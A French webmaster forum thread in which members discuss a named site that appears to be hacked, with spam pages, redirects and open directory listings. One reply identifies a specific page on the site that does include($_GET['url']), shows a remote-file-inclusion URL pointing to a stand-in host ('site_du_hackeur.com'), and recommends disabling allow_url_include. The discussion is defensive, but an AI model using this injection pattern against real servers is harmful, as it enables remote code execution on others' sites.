Comment expliquer à quelqu'un que son site est hacké ?

Nouveau WRInaute
Bonjour,

Je viens de voir que le site https://www.info-culture.com est hacké.
Mais pas en direct. Cela ne se voit pas à premier abord.

En faisant: site:info-culture.com sexe dans google et en allant la page 6, j'ai vu des résultats bizarres ( voir l'image)

1582648826-1.jpg


A priori il y a eu des créations de pages et des redirections.

Ce sera difficile d'expliquer car les gens de info-culture.com ne semblent pas être des spécialistes et meconnaisent peut-être les retombés negatives d'un tel acte sur le site.
 
WRInaute passionné
Ben en leur donnant des exemples d'urls de leur site qui affichent des trucs porno, ils devraient réaliser qu'il y a un souci, sinon tant pis pour eux...
 
WRInaute impliqué
Avec en prime la possibilité de lister les fichiers depuis leur serveur apache, et pour au moins un d'entre eux avoir accès au code php…
 
Nouveau WRInaute
Je pense surtout qu'il a constaté une page bizarre et a tapé ce qu'il lui semblait le plus simple pour faire ressortir ce genre de pages.
Sinon pas étonnant que le site se soit fait hacké, on peut lister beaucoup, voir tout les répertoires sans problèmes, y compris des répertoires sensibles.
 
Nouveau WRInaute
Oui tout a fait Li0n.
Un mail a été envoyé aux responsables du site via leur formulaire avec comme lien ce"topic"
Pour qu'ils comprennent qu'il y a un soucis.
 
WRInaute occasionnel
/public/authentification.php?url=/public/authentification.php

ça c'est dangereux de mettre des include($_GET['url']);

Je suis presque sûr que dans le php.ini il y a ceci sur "on" :

allow_url_fopen = on
allow_url_include = on

Il faut les mettre sur off !!


allow_url_fopen : tu peux le mettre sur "on" seulement s'il n'existe aucun "fopen($_GET...)
Idem pour allow_url_include tu peux le mettre sur "on" seulement s'il n'existe aucun include($_GET...) mais pas de bol celui-ci doit être utilisé.

En résumé un hackeur a suremùent eu l'idée de remplacer ceci :

/public/authentification.php?url=/public/authentification.php

par:

/public/authentification.php?url=http://site_du_hackeur.com/fichier.php avec des caractères spéciaux devant et après l'url et aussi une page fichier.php bien spéciale qui agit comme un fichier en local


Il faut mettre ça dans php.ini:

allow_url_include = off
 
Discussions similaires
Haut